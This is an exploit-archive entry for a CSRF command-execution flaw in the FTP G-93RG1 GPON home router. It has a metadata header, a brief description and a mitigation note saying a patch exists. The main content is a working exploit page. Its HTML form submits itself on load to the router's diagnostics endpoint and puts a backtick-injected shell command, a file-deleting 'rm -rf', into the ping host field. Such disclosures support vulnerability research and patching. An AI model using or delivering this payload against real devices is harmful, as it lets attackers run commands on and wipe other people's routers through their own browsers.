GPON Home CSRF With Command ExecuteVulnerability

vendor:

FTP G-93RG1

by:

Phan Thanh Duy (logicaway) - KAISAI12 (ceh.vn)

8,8

CVSS

HIGH

Command Execute Vulnerability

CWE

Product Name: FTP G-93RG1

Affected Version From: 3.0.0 Build 120531

Affected Version To: 3.0.0 Build 120531

Patch Exists: YES

Related CWE: N/A

CPE: FTP G-93RG1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows 8 64-bit

2020

GPON Home CSRF With Command ExecuteVulnerability

GPON Home CSRF With Command Execute Vulnerability is a vulnerability that allows an attacker to execute arbitrary commands on a vulnerable device. The vulnerability exists due to insufficient validation of user-supplied input in the web-based management interface. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious code to the vulnerable device. This will allow the attacker to execute arbitrary commands on the vulnerable device.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update their devices to the latest version of the firmware.

Source

Exploit-DB raw data:

<!--
######################################################################
# Exploit Title: GPON Home CSRF With Command ExecuteVulnerability
# Author: Phan Thanh Duy (logicaway) - KAISAI12 (ceh.vn)
# E-mail:(facebook https://www.facebook.com/duy.phanthanh.75),(
https://www.facebook.com/kai.sai.35)
# Category: Hardware
# Google Dork: N/A
# Vendor: FTP Viet Nam
# Firmware Version: 3.0.0 Build 120531
# Product: FTP G-93RG1
#
#
# Tested on: Windows 8 64-bit
######################################################################

#Introduction
==============

#Description of Vulnerability
=============================
Execute command with CSRF

#Exploit
========
-->

<html>
<head>
<title>CSRF Demo Exploit</title>
</head>
<body>

<form name="auto" method="POST"
action="http://192.168.1.1/GponForm/diag_XForm"
enctype="multipart/form-data">
<input type="hidden" name="XWebPageName" value="diag"/>
<input type="hidden" name="diag_action" value="ping"/>
<input type="hidden" name="wan_conlist" value="0"/>
<input type="hidden" name="dest_host" value="`rm -rf stuff`"/>
<input type="hidden" name="ipver" value="0"/>
<!-- input type="submit" name="submit"/> -->
</form>
<script type="text/javascript">
      document.auto.submit();
</script>
</body>
</html>